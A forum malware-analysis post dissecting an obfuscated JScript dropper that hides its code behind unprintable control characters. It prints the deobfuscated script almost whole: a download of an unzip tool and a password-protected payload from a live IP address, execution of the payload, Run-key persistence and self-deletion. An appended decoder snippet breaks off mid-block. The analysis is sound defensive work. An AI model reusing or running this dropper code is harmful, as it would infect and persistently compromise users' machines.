Malware Analysis oracamento82323423723.js - uses some unprintable chars - zip file + zip tool downloaded

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/3-1-17-9.67144/
Thanks to @Solarquest

oracamento82323423723.js

Why this sample?

It uses unprintable chars for its obfuscation / deobfuscation methods, and a big part of useless data.
This is the first time I will show this family here.
The problem with the unprintable chars is that I will not be able to copy them here, so I will use some screenshots and/or replace them in the analysis parts.

1) What it looks like:

sample.jpg


You can see normal chars, and unprintable chars: the parts with blank letters and a grey or black background.

2) Simplification:

First thing I noticed:

The long part with:

var NuvVsNhfSWd=[34,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198,764,9,203,3,746,200,984,198........
...

]

=> can be deleted: not used, only here to obfuscate a bit more.

The really important parts are on the new screenshot:

sample2.jpg

3) What are unprintable chars:

Each char has a code, that we name "char code", that can be given in decimal, hexadecimal, etc.
In a text file, or a file with content that can be read or written as text, the char codes used as values correspond to a writable single char, with the aim of being understandable / readable.
But there are other values with another meaning, that are not used to give an understandable / readable char.

From NON PRINTABLE CHARACTERS:

sample3.jpg


We can see in this table non printable chars, with their code in DEC and HEX.

Some of these chars appear on the sample I am analyzing currently.

For example, none of these char codes can represent a char. An editor will show these chars with their special name, like SOH that means "Start of Heading", or RS that means "Record Separator" / "Up Arrow".

This is a part of a string used in the current sample:

sample4.jpg

SOH, STX, EOT, etc. => each one counts as a single char, but is represented here as if it had 3 / 2 chars in white on a grey background: its name, to tell us that it is an unprintable char.

If you click before SOH and then on the right arrow, the cursor will move after SOH in one step, and will be before STX (because it represents only one char, but unprintable).

The problem with these unprintable chars: if you try to open the sample in a debugger, or copy-paste the content into an editor, these unprintable chars will not appear.

Example: the same string I put above in the screenshot, copy-pasted here:

üýþ#'@QZ^`|~";

You can see that the part from SOH to GS ... doesn't appear.
BUT this part is really present when I am in the MT editor, even if I can't see it: when the cursor reaches the part where these unprintable chars should appear (but don't), I click several times on the right arrow, and the cursor stays at the same place, until all unprintable chars have been taken into account => then, the cursor moves on to the last normal chars :D
ONCE the post is saved, these parts are lost...
 

DardiM

4) Deobfuscation:

4-1) Analysis of the methods used:


I will put the unprintable chars in this color.

This is a simplified version, with the structure used: some strings have been replaced with long names that represent the real data :)

Code:
eval((function (s) {
    var a, c, e, i, j, o = "", r, t = string_with_all_chars_to_be_deleted;
    for (i = 0; i < s.length; i++) {
        r = t + s[i][2];
        a = s[i][1].split("RS");
        for (j = a.length - 1; j >= 0; j--) {
            s[i][0] = s[i][0].split(r.charAt(j)).join(a[j]);
        }
        o += s[i][0];
    }
    return o.replace(/US/g, "\"");
})(
[
    [
        obfuscated_string_part1 + obfuscated_string_part2,
        string_with_group_of_chars_to_replace_the_deleted_char_for_a_given_index,
        ""
    ]
]
));

=> 3 strings in a tab (array) that is in the s tab :p
=> a tab in the s tab

Why do I name this tab s?
Because [ [....] ] => this part is given as parameter to the function, and we can see at the beginning: function (s) {

I will show the data later (I can't copy-paste it here because of the unprintable chars).

Explanation of each part:

eval(

=> to evaluate / run the bad part once deobfuscation has been made
(function(s){

=> function that will make the deobfuscation
var a,c,e,i,j,o="",r,t= string_with_all_chars_to_be_deleted;

=> some vars are initialized
for(i=0 ; i< s.length; i++)
{

=> loop from 0 to s.length: s is the parameter of the current function: the tab that contains a tab that contains 3 strings ...
=> I put in red (see the parameter passed, at the end of the current code): its length: 1

=> the loop is useless because the operations before the second loop will be used one time ....
=> an obfuscated trick
=> i will only have one value: for the deobfuscation part: 1

r=t+s[ i ][2];
=> r = t + s[0][2]
=> s[0][2]: to access the element of the tab in s (that is also a tab), and its 3rd element (index: 2 => 3rd element)
=> "": empty string

Then:

=> r = t + s[0][2]
=> r = t + ""
=> r = t
=> r & t: string_with_all_chars_to_be_deleted
hahaha, another obfuscated part
a=s[ i ][1].split("RS");

=> s[0][1]: to access the second string (index: 1) in the tab of strings:
string_with_group_of_chars_to_replace_the_deleted_char_for_a_given_index

array.jpg

=> s[0][1].split("RS"): cuts this string to obtain an array of parts, with the unprintable char represented by RS as separator

first parts (see the screenshots in the previous part):


"$BJqo6Cm"
"¡x7Gvgx"
"¢eFsio"
"older"
"Name"
"£r("
" \\\\"
"f¤¥+US§US+"
"=new Ac"
"©tiveX"
"ªObje"
"var"
"US,US"
etc,

You can see that the unprintable char represented by US is present
for(j=a.length - 1;j>=0;j--)
{

=> real loop: will use all parts of the r string and the a array, but beginning from the end!
s[ i ][0]=s[ i ][0].split(r.charAt(j)).join(a[j]);

=> s[ 0 ][0]=s[ 0 ][0].split(r.charAt(j)).join(a[j]);

not too hard to understand:

s[ 0 ][0] is: obfuscated_string_part1 + obfuscated_string_part2: the obfuscated script part that will be evaluated / run by the function eval, once deobfuscated.
real_part.jpg

For the current j index:

r.charAt(j): retrieves the char to be replaced in the obfuscated string, from the first string:

first_string.jpg

a[j]: retrieves from the array a the group of chars to put in place of the removed char

first parts (see the screenshots in the previous part):

"$BJqo6Cm"
"¡x7Gvgx"
"¢eFsio"
"older"
"Name"
"£r("
" \\\\"
"f¤¥+US§US+"
"=new Ac"
"©tiveX"
"ªObje"
"var"
"US,US"
etc,
s[ 0 ][0] is overwritten.

The replacement is made by splitting the whole string with the char, and joining the parts by adding the group.

Example:

"h$e$l$l$o" => to replace all "$" by "-" => "h$e$l$l$o".split("$").join("-")
first step => split("$"): temporary array: "h" "e" "l" "l" "o"
second step => .join("-"): "h-e-l-l-o"
This method is done in the current loop for all parts in the array a
}
o+=s[ i ][0];

=> At the end, o contains the string almost deobfuscated: only the unprintable chars represented by US are still present
}
return o.replace(/US/g,"\"");
=> return o.replace(/US/g,"\"");
=> returns the completely deobfuscated string, US has been replaced by \"
})(
[
[
obfuscated_string_part1 + obfuscated_string_part2,
string_with_group_of_chars_to_replace_the_deleted_char_for_a_given_index,
""

=> 3 strings in the tab in the s tab :p
]

=> tab in the s tab
]

=> s
=> to access one of the strings: s[0][index_of_the_string]
)
);
Conclusion: similar to a multi replacement of chars by groups of chars.

=> an obfuscated string

Using a loop, for a current index:
=> a string of chars that will be used to know which char to replace
=> an array of strings that will be used to replace the char above
At the end: the "deobfuscated" real bad part
4-2) What the deobfuscated part looks like:

As always, I modified some parts to avoid copy-paste => run => infection :p

As a string:

Code:
"$_BJqo6Cmx7GvgxeFsior=function(n){if(typeof($BJqo6Cmx7GvgxeFsior.list[n])==\"string\")return $BJqo6Cmx7GvgxeFsior.list[n].split(\"\").reverse().join(\"\");return $BJqo6Cmx7GvgxeFsior.list[n]};$BJqo6Cmx7GvgxeFsior.list=[\"PTTHLMX.2LMXSM\",\"exe.T1973HDA\",\" x exe.az7\",\"gpj.rajcem/baf/551.551.991.821//:ptth\",\"tcejbOmetsySeliF.gnitpircS\",\"htaP\\\\yrrebkcalB\\\\yrtsigeRwoL\\\\rerolpxE tenretnI\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"qrAemaN\\\\yrrebkcalB\\\\yrtsigeRwoL\\\\rerolpxE tenretnI\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"llehS.tpircSW\",\"%ATADPPA%\",\"emaN\\\\yrrebkcalB\\\\yrtsigeRwoL\\\\rerolpxE tenretnI\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"\\\\nuR\\\\noisreVtnerruC\\\\swodniW\\\\tfosorciM\\\\erawtfoS\\\\RESU_TNERRUC_YEKH\",\"txt.pizolelarap/baf/551.551.991.821//:ptth\",\"piz.pmeT\",\"llehS.tpircsW\",\"T1973HDA\",\"maertS.BDODA\"];var c=new ActiveXObject($BJqo6Cmx7GvgxeFsior(7)),d=c.ExpandEnvironmentStrings($BJqo6Cmx7GvgxeFsior(8)),f=$BJqo6Cmx7GvgxeFsior(6),g=new ActiveXObject($BJqo6Cmx7GvgxeFsior(7));try{var ArqName=\"\",EXEName=\"\";ArqName=g.regread(f)}catch(e){}(ArqName===\"\")?(EXEName=n(10),ArqName=EXEName,EXEName=EXEName+\".exe\",g.RegWrite($BJqo6Cmx7GvgxeFsior(6),ArqName),g.RegWrite($BJqo6Cmx7GvgxeFsior(9),EXEName)):(EXEName=ArqName+\".exe\",g.RegWrite($BJqo6Cmx7GvgxeFsior(6),ArqName),g.RegWrite($BJqo6Cmx7GvgxeFsior(9),EXEName));f=$BJqo6Cmx7GvgxeFsior(5);try{var folderName=\"\";folderName=g.regread(f)}catch(e){}(folderName===\"\")?(folderName=d+\"\\\\\"+n(10),g.RegWrite($BJqo6Cmx7GvgxeFsior(5),folderName),g.RegWrite($BJqo6Cmx7GvgxeFsior(10)+EXEName,folderName+\"\\\\\"+EXEName)):(g.RegWrite($BJqo6Cmx7GvgxeFsior(5),folderName),g.RegWrite($BJqo6Cmx7GvgxeFsior(10)+EXEName,folderName+\"\\\\\"+EXEName));var h=new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));if(!h.FolderExists(folderName)){var objFolder=h.CreateFolder(folderName);objFolder.Attributes=34}var i=\"\";i=folderName+\"\\\\\"+EXEName;var j=new 
ActiveXObject($BJqo6Cmx7GvgxeFsior(4));(j.FileExists(i))?(j.DeleteFile(i)):0;m($BJqo6Cmx7GvgxeFsior(11),folderName+\"\\\\7za.exe\");m($BJqo6Cmx7GvgxeFsior(3),folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(12));var k=\"\";k=\"102030\";var l=\"\";l=folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(12);Str7zip=folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(2)+l+\" -p\"+k+\" -o\"+folderName+\" -y\";unzip=new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));unzip.Run(Str7zip,1,1);(j.FileExists(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(1)))?(j.MoveFile(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(1),i)):0;(j.FileExists(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(14)))?(j.MoveFile(folderName+\"\\\\\"+$BJqo6Cmx7GvgxeFsior(14),folderName+\"\\\\\"+ArqName)):0;WSHELL=new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));WSHELL.Exec(i);var h=new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));h.DeleteFile(WScript.ScriptFullName);function m(o,p){var q=new ActiveXObject($BJqo6Cmx7GvgxeFsior(0));q.open(\"GET\",o,false);q.send();(q.Status==200)?(objStream=new ActiveXObject($BJqo6Cmx7GvgxeFsior(15)),objStream.open(),objStream.Type=1,objStream.Write(q.responseBody),objStream.Position=0,objStream.SaveToFile(p,2),objStream.Close()):0}function n(x){var s=\"\";while(s.length<x&&x>0){var r=Math.random();s+=(r<0.1?Math.floor(r*100):String.fromCharCode(Math.floor(r*26)+(r>0.5?97:65)))}return s}"

After some formatting, the code that will be run: we can see that it is written in an obfuscated way :p

Code:
$_BJqo6Cmx7GvgxeFsior = function(n) {
    if (typeof($BJqo6Cmx7GvgxeFsior.list[n]) == "string") return $BJqo6Cmx7GvgxeFsior.list[n].split("").reverse().join("");
    return $BJqo6Cmx7GvgxeFsior.list[n]
};
$BJqo6Cmx7GvgxeFsior.list = ["PTTHLMX.2LMXSM", "exe.T1973HDA", " x exe.az7", "gpj.rajcem/baf/551.551.991.821//:ptth", "tcejbOmetsySeliF.gnitpircS", "htaP\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "qrAemaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "llehS.tpircSW", "%ATADPPA%", "emaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "txt.pizolelarap/baf/551.551.991.821//:ptth", "piz.pmeT", "llehS.tpircsW", "T1973HDA", "maertS.BDODA"];
var c = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7)),
    d = c.ExpandEnvironmentStrings($BJqo6Cmx7GvgxeFsior(8)),
    f = $BJqo6Cmx7GvgxeFsior(6),
    g = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7));
try {
    var ArqName = "",
        EXEName = "";
    ArqName = g.regread(f)
} catch (e) {}(ArqName === "") ? (EXEName = n(10), ArqName = EXEName, EXEName = EXEName + ".exe", g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName), g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName)) : (EXEName = ArqName + ".exe", g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName), g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName));
f = $BJqo6Cmx7GvgxeFsior(5);
try {
    var folderName = "";
    folderName = g.regread(f)
} catch (e) {}(folderName === "") ? (folderName = d + "\\" + n(10), g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName), g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName)) : (g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName), g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName));
var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));
if (!h.FolderExists(folderName)) {
    var objFolder = h.CreateFolder(folderName);
    objFolder.Attributes = 34
}
var i = "";
i = folderName + "\\" + EXEName;
var j = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));
(j.FileExists(i)) ? (j.DeleteFile(i)) : 0;
m($BJqo6Cmx7GvgxeFsior(11), folderName + "\\7za.exe");
m($BJqo6Cmx7GvgxeFsior(3), folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12));
var k = "";
k = "102030";
var l = "";
l = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12);
Str7zip = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(2) + l + " -p" + k + " -o" + folderName + " -y";
unzip = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));
unzip.Run(Str7zip, 1, 1);
(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1), i)) : 0;
(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14), folderName + "\\" + ArqName)) : 0;
WSHELL = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));
WSHELL.Exec(i);
var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));
h.DeleteFile(WScript.ScriptFullName);

function m(o, p) {
    var q = new ActiveXObject($BJqo6Cmx7GvgxeFsior(0));
    q.open("GET", o, false);
    q.send();
    (q.Status == 200) ? (objStream = new ActiveXObject($BJqo6Cmx7GvgxeFsior(15)), objStream.open(), objStream.Type = 1, objStream.Write(q.responseBody), objStream.Position = 0, objStream.SaveToFile(p, 2), objStream.Close()) : 0
}

function n(x) {
    var s = "";
    while (s.length < x && x > 0) {
        var r = Math.random();
        s += (r < 0.1 ? Math.floor(r * 100) : String.fromCharCode(Math.floor(r * 26) + (r > 0.5 ? 97 : 65)))
    }
    return s
}


Just to show you a funny part:
Code:
[
     "PTTHLMX.2LMXSM",

     "exe.T1973HDA",

     " x exe.az7",

      "gpj.rajcem/baf/551.551.991.821//:ptth",

     "tcejbOmetsySeliF.gnitpircS", "htaP\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE   tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",

     "qrAemaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH", "llehS.tpircSW", "%ATADPPA%",

     "emaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",

     "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",
     "txt.pizolelarap/baf/551.551.991.821//:ptth",
      "piz.pmeT",
      "llehS.tpircsW",
      "T1973HDA",
     "maertS.BDODA"
];

=> all important strings reversed

5) Quick analysis:

After having flipped each string:


Interesting strings: almost all you need to understand what is done :D

0 - "MSXML2.XMLHTTP"
1 - "ADH3791T.exe"
2 - "7za.exe x "
3 - "http ://128.199.155.155/fab/mecjar.jpg"
4 - "Scripting.FileSystemObject"
5 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Path"
6 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\NameArq"
7 - "WScript.Shell"
8 - "%APPDATA%"
9 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Name"
10 - "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
11 - "http ://128.199.155.155/fab/paralelozip.txt"
12 - "Temp.zip"
13 - "Wscript.Shell"
14 - "ADH3791T"
15 - "ADODB.Stream"

http ://128.199.155.155/fab/paralelozip.txt

=> an exe file: 7za.exe => command line zip utility

http ://128.199.155.155/fab/mecjar.jpg

=> a zip file, password protected

Inside: 3 files:

ADH3791T - 3839 KB
ADH3791T.exe => the PAYLOAD run - 406 kB
GdanOff.dll - 146 KB

(I will show the names used in the following parts)

=> 14/56: a variant of Win32/Injector.DJJP

Antivirus scan for 99b023d6b5a116474e18c2da847fa2bdb110c1d409b7dbfb561872d7d3e5b801 at 2017-01-04 14:08:04 UTC - VirusTotal

6) Each part in detail:

$BJqo6Cmx7GvgxeFsior = function(n) {
if (typeof($BJqo6Cmx7GvgxeFsior.list[n]) == "string")
return $BJqo6Cmx7GvgxeFsior.list[n].split("").reverse().join("");

=> flips the string given as parameter: index
return $BJqo6Cmx7GvgxeFsior.list[n]
=> not a string? => returns the element without reversing it

};

=> function that returns the reversed string asked for as parameter, from the list $BJqo6Cmx7GvgxeFsior.list
$BJqo6Cmx7GvgxeFsior.list = [
"PTTHLMX.2LMXSM",
"exe.T1973HDA",
" x exe.az7",
"gpj.rajcem/baf/551.551.991.821//:ptth",
"tcejbOmetsySeliF.gnitpircS",
"htaP\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",
"qrAemaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",
"llehS.tpircSW",
"%ATADPPA%",
"emaN\\yrrebkcalB\\yrtsigeRwoL\\rerolpxE tenretnI\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",
"\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\RESU_TNERRUC_YEKH",
"txt.pizolelarap/baf/551.551.991.821//:ptth",
"piz.pmeT",
"llehS.tpircsW",
"T1973HDA",
"maertS.BDODA"
];

=> list of strings that will be used for the important parts: creates the ActiveX objects, writes registry keys, downloads the files that will be used for the infection, etc

var c = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7)),

=> new ActiveXObject( "wScripT.shelL")
=> creates a shell object (used for example to run some files)

d = c.ExpandEnvironmentStrings($BJqo6Cmx7GvgxeFsior(8)),

=> $BJqo6Cmx7GvgxeFsior(8) => gets the "%ATADPPA%" string
=> uses the shell object to get the "%ATADPPA%" path

=> Example: "C:\Users\\DardiM\AppData\\Roaming"

f = $BJqo6Cmx7GvgxeFsior(6),

=> gets the string: "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\NameArq"

g = new ActiveXObject($BJqo6Cmx7GvgxeFsior(7));

=> $BJqo6Cmx7GvgxeFsior(7): "wScripT.shelL"
=> creates another shell object (used for example to run some files)

try {

var ArqName = "",
EXEName = "";
ArqName = g.regread(f)

=> tries to read the value of the key from the registry

} catch (e) {

=> if an error was thrown when it tried to read the key, we are here :)

}

(ArqName === "") ? (


=> like an if then

=> value: empty string (the value that was put before the try to read the registry key) => the key doesn't exist (the attempt to read the key failed)

EXEName = n(10),

=> n: function that builds a random name: 10: the number of chars wanted

=> Example: "IxnHFxw1v4"
ArqName = EXEName,

EXEName = EXEName + ".exe",

=> Example: "IxnHFxw1v4.exe"
g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName),

=> $BJqo6Cmx7GvgxeFsior(6):

"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\NameArq"

=> creates the reg key: example: "IxnHFxw1v4"
g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName)

=> $BJqo6Cmx7GvgxeFsior(9):

"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Name"

=> creates the reg key: example: "IxnHFxw1v4.exe"
)
:
=> like an else
(

=> here if g.regread(f) returned a value (ArqName not equal to "")

EXEName = ArqName + ".exe",

=> it uses the retrieved ArqName value to build the exe name

g.RegWrite($BJqo6Cmx7GvgxeFsior(6), ArqName),
g.RegWrite($BJqo6Cmx7GvgxeFsior(9), EXEName)

=> creates the reg keys (same keys as in the then part)
);

( ... === ?) part_to_do_if_true : part_to_do_if_false

=> a method that is similar to:
if (....) {
...
...
}else {
...
...
}


f = $BJqo6Cmx7GvgxeFsior(5);

=> "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Path"

Now, a similar method is used, for the path:

try {
var folderName = "";
folderName = g.regread(f)

=> tries to retrieve the path from the registry (exists if already infected)

} catch (e) {

}
(folderName === "") ? (

folderName = d + "\\" + n(10),

=> creates a random folder name and puts the %APPDATA% path found in the previous part at the beginning

=> Example: "C:\Users\\DardiM\AppData\Roaming\KvDnowGyxH"
g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName),

=> creates the key

g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName)

=> creates the entry in:

"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
=> sets the path of the exe file
=> to run the exe file (the malware) at run time.
) :
(

the script reaches here if "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\Blackberry\\Path" already exists
=> does the same as above, but using the name retrieved from the registry
g.RegWrite($BJqo6Cmx7GvgxeFsior(5), folderName),
g.RegWrite($BJqo6Cmx7GvgxeFsior(10) + EXEName, folderName + "\\" + EXEName)
);

var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));

=> new ActiveXObject("Scripting.FileSystemObject")
=> to manipulate files / folders

if (!h.FolderExists(folderName)) {

=> tests if the folder doesn't exist

var objFolder = h.CreateFolder(folderName);

=> creates the folder

Example: "C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH"

objFolder.Attributes = 34

=> sets the attributes of the created folder to 34 => 0x22 (hexadecimal value):

0x20: Archive
0x2: Hidden

}
var i = "";
i = folderName + "\\" + EXEName;

=> path of the exe file

var j = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));

=> new ActiveXObject("Scripting.FileSystemObject")
=> to manipulate files / folders
(j.FileExists(i)) ? (j.DeleteFile(i)) : 0;

=> if the exe file already exists: delete it

m($BJqo6Cmx7GvgxeFsior(11), folderName + "\\7za.exe");

=> m: download function:

=> downloads: http ://128.199.155.155/fab/paralelozip.txt
=> saves it as: folderName + "\\7za.exe"

m($BJqo6Cmx7GvgxeFsior(3), folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12));

=> downloads: http ://128.199.155.155/fab/mecjar.jpg
=> saves it as: folderName + "\\Temp.zip"

var k = "";
k = "102030";

=> password of the zip file !!!
var l = "";

l = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(12);

=> folderName + "\\Temp.zip"

Str7zip = folderName + "\\" + $BJqo6Cmx7GvgxeFsior(2) + l + " -p" + k + " -o" + folderName + " -y";

=> the command line to be used to unzip the file:

Example:

=> "C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\7za.exe x C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\Temp.zip -p102030 -oC:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH -y"


unzip = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));

=> new ActiveXObject( "Wscript.Shell")
=> creates a shell object

unzip.Run(Str7zip, 1, 1);

=> uses its Run method with the above command line
=> unzips the archive

files.jpg

(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(1), i)) : 0;

=> does the file ADH3791T.exe exist?

=> if yes: the file is renamed with the random name created or retrieved from the registry

Example:

"C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\IxnHFxw1v4.exe"
(j.FileExists(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14))) ? (j.MoveFile(folderName + "\\" + $BJqo6Cmx7GvgxeFsior(14), folderName + "\\" + ArqName)) : 0;

=> does the file ADH3791T exist?

=> if yes: the file is renamed with the random name created or retrieved from the registry
Example:

"C:\\Users\\DardiM\\AppData\\Roaming\\KvDnowGyxH\\IxnHFxw1v4"

The folder once all has been done :
files2.jpg

WSHELL = new ActiveXObject($BJqo6Cmx7GvgxeFsior(13));

=> creates another shell object (they like creating the same object several times ...)

WSHELL.Exec(i);

=> runs the malware

Example:

"C:\Users\\DardiM\AppData\Roaming\KvDnowGyxH\IxnHFxw1v4.exe"

Summary :

- KvDnowGyxH: random folder created, with attributes Archive + Hidden
- IxnHFxw1v4: a file without extension, extracted from the archive, once renamed
- IxnHFxw1v4.exe: the exe file extracted from the archive, once renamed
Its value is in the Run part of the registry: PC runs => Malware runs
- GdanOff.dll

var h = new ActiveXObject($BJqo6Cmx7GvgxeFsior(4));

=> new ActiveXObject("Scripting.FileSystemObject")
=> creates another fso object to manipulate files / folders

h.DeleteFile(WScript.ScriptFullName);

=> deletes the currently running script file

Here, the functions used:

The downloader
function m(o, p) {
var q = new ActiveXObject($BJqo6Cmx7GvgxeFsior(0));

=> new ActiveXObject("MSXML2.XMLHTTP")
=> creates an http object to get the remote files

q.open("GET", o, false);

=> opens a connection: o is the URL (first parameter)

q.send();

=> sends the http request

(q.Status == 200) ? (

=> if the request status is OK

objStream = new ActiveXObject($BJqo6Cmx7GvgxeFsior(15)),

=> new ActiveXObject("ADODB.Stream")
=> creates a stream object to save the data received by the http request
objStream.open(),

=> opens the stream object
objStream.Type = 1,

=> 1: data will be considered as binary
objStream.Write(q.responseBody),

=> writes the received data to the stream
objStream.Position = 0,

=> after the write, the position has changed: sets it to 0
objStream.SaveToFile(p, 2),

=> saves the data to a file (path is the second parameter of the current function)
objStream.Close()

=> closes the stream object
) : 0
}

The function that returns a random name: length as parameter
function n(x) {
var s = "";
while (s.length < x && x > 0) {

=> a while loop until the name has the required length (parameter x)
var r = Math.random();

=> random number between 0 and 1

s += (r < 0.1 ? Math.floor(r * 100) : String.fromCharCode(Math.floor(r * 26) + (r > 0.5 ? 97 : 65)))

=> builds the random name

}
return s

=> returns the random name

}

Reminder (already talked about in part 5)

http ://128.199.155.155/fab/paralelozip.txt

=> an exe file: 7za.exe => command line zip utility

http ://128.199.155.155/fab/mecjar.jpg

=> a zipped file, password protected

Inside: 3 files:

ADH3791T - 3839 KB
ADH3791T.exe => the PAYLOAD run - 406 kB
GdanOff.dll - 146 KB

ADH3791T and ADH3791T.exe are renamed after extraction

Example: IxnHFxw1v4 and IxnHFxw1v4.exe (random name)

=> 14/56: a variant of Win32/Injector.DJJP

Antivirus scan for 99b023d6b5a116474e18c2da847fa2bdb110c1d409b7dbfb561872d7d3e5b801 at 2017-01-04 14:08:04 UTC - VirusTotal
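As an added example (not code from the post or from the sample), here is a stage-1 decoder with the same logic as the IIFE analysed in part 4-1, but returning the decoded text instead of eval'ing it, run on a constructed input that uses the same RS / US control characters as placeholders, plus a helper that renders control characters by their names the way the editor in part 3 does; all names and the sample payload are assumptions.

```javascript
// Added example, not code from the post or from the sample: a stage-1
// decoder with the same logic as the IIFE analysed in part 4-1, but it
// returns the decoded text instead of eval'ing it.  Names and the sample
// payload below are assumptions constructed for illustration.

const RS = "\x1e"; // Record Separator: delimits the replacement groups
const US = "\x1f"; // Unit Separator: stands in for a double quote

// Placeholder chars that the decoder expands; the sample's t string is
// a run of such control characters.
const PLACEHOLDERS = "\x01\x02\x03\x04";

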